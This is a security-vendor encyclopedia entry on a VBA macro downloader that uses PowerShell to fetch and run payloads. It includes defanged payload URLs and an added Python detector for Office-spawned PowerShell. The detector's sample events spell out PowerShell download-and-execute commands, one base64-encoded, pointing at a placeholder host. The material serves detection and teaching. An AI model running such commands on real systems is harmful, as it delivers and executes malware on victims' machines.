VBA/Agent.AGX!tr.dldr
Analysis
VBA/Agent.AGX!tr.dldr is a generic detection for a type of macro downloader trojan that downloads other malware onto the compromised computer. Since this is a generic detection, files that are detected as VBA/Agent.AGX!tr.dldr may have varying behavior.
Below are examples of some of these behaviors:
- It downloads the following files:
- %Desktop%/[Random].exe : This file is detected as W32/GenKryptik.BQUN!tr.
- %Desktop%/[Random].exe : This file is detected as W32/GenKryptik.BRNO!tr.
- This malware issues a PowerShell command line that downloads a file from one of the remote sites listed below, drops it on the host (usually in %Desktop%), and then executes it.
- hxxps://bitcl{Removed}.gq/sdk
- hxxps://freefly{Removed}.tk/rens
Below is an illustration of an infected document:
- Figure 1: Infected Document.
- Figure 2: Infected Document.
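The behavior described above (an Office document spawning PowerShell that fetches a payload and runs it from %Desktop%) is visible in process-creation telemetry. The following detection sketch is an added example, not Fortinet's code or part of this encyclopedia entry; it assumes Sysmon-style field names (parent_image, image, command_line) and runs over a handful of constructed events (the URLs and paths in them are placeholders, not indicators from the page). It also handles the -EncodedCommand case, which the page does not mention but which hides the same download primitive from naive string matching.

```python
import base64
import re

# Office hosts whose child processes are worth scrutiny (assumption: typical macro carriers).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Download primitives commonly seen in macro-launched PowerShell one-liners.
DOWNLOAD_PATTERNS = [
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"start-bitstransfer", r"invoke-restmethod", r"\birm\b",
]
# An .exe path under a Desktop folder, matching the %Desktop%/[Random].exe drop location.
DESKTOP_PATTERN = re.compile(r"\\desktop\\[^\s'\"]+\.exe", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return a list of reasons the event looks like the Office -> PowerShell downloader pattern."""
    reasons = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if parent not in OFFICE_PARENTS or image not in SHELLS:
        return reasons
    reasons.append(f"{parent} spawned {image}")
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command decoded")
        cmd = cmd + " " + decoded  # scan both the raw and the decoded text
    low = cmd.lower()
    for pat in DOWNLOAD_PATTERNS:
        if re.search(pat, low):
            reasons.append(f"download primitive: {pat}")
            break
    if DESKTOP_PATTERN.search(cmd):
        reasons.append("executable written under %Desktop%")
    return reasons


def flag_macro_downloaders(events):
    """Return [(index, reasons)] for events where Office spawned a shell that fetches or drops a payload."""
    findings = []
    for i, ev in enumerate(events):
        reasons = analyse_event(ev)
        if any(r.startswith(("download primitive", "executable written")) for r in reasons):
            findings.append((i, reasons))
    return findings


def _encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style process-creation records for illustration; not real telemetry.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": ("powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                      "'hxxps://example.invalid/sdk','C:\\Users\\u\\Desktop\\a1b2.exe');"
                      "Start-Process 'C:\\Users\\u\\Desktop\\a1b2.exe'\"")},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('hxxps://example.invalid/rens')")},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign: user-launched shell, no download
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c Get-ChildItem C:\\Users\\u\\Desktop"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",  # benign: print spooler helper spawned by Word
     "command_line": "C:\\Windows\\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for idx, reasons in flag_macro_downloaders(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The two constructed Word-spawned events are flagged (the first on the DownloadFile call and the Desktop .exe path, the second only after its encoded command is decoded); the Explorer-launched shell and the spooler helper are not. A production rule would additionally enrich with the file-write and network events that follow, since the page notes the dropped file is itself detected under a separate signature.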
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Availability |
---|---|
FortiClient | Extreme |
FortiMail | Extreme |
FortiSandbox | Extreme |
FortiWeb | Extreme |
Web Application Firewall | Extreme |
FortiIsolator | Extreme |
FortiDeceptor | Extreme |
FortiEDR | |
Version Updates
Date | Version | Detail |
---|---|---|
2019-05-28 | 68.84900 | Sig Updated |